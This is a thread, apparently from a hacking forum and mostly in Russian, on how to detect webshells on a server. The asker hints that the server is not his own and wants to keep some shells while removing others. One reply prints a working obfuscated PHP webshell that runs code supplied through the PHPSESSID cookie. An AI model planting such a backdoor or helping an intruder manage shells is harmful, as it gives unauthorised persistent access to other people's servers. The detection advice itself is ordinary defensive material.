Приветствую, многоуважаемые жители форума, подскажите, пожалуйста, как вычислить все вебшеллы на сервере?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Обнаружение вебшеллов
- Автор темы slaper
- Дата начала
О каком сервере идет речь? О своем? Если да, то рекомендую imunify360, он детектит (правда не всегда) даже те мини-шеллы которые сам зае#ешься грепать, функции которых через конкатенацию запилены, типа таких:
PHP:
$function = 'a' . 'sse' . 'r' . 't';
if (isset($_COOKIE['PHPSESSID'])) {
$function($_COOKIE['PHPSESSID']);
} else {
echo "";
}- Автор темы
- Добавить закладку
- #3
ну как сказать о своем))) а это имеет значение в техническом плане?
- Автор темы
- Добавить закладку
- #4
желательно, конечно, чтобы можно было выбирать какие шеллы удалять, а какие нет
Ну например тот же imunify360 ты с правами www-root/www-data попросту не поставишь, нужен рут. Если ты залился на какой-то сервер и хочешь выпилить оттуда предполагаемые чужие шеллы, то логичнее выкачать все файлы сайта и прогнать их у себя на локалке вышеупомянутым мною инструментом.
Да, потому что даже простенький скрипт запустить - он у тебя по таймауту из php.ini закроется раньше, чем отработать успеет, если на сайте более-менее файлов много и запускать его нужно из командной строки.
Но решение выше подсказано. Выкачиваешь бэкап и у себя на локалке гоняешь уже чем угодно, хоть Касперским) Он сигнатуры основных шелов знает.
- Автор темы
- Добавить закладку
- #7
спасибо большое!
Подумайте какое-то время над своим поведением.
дизлайкеры ушлепки
Последнее редактирование:
a lot of different ways but i always suggest starting with access logs. grepping for POSTs and in all domains in question can prove helpful. also searching web dirs for certain over used functions from most shells (e.g., grep for eval, execs, base64, etc).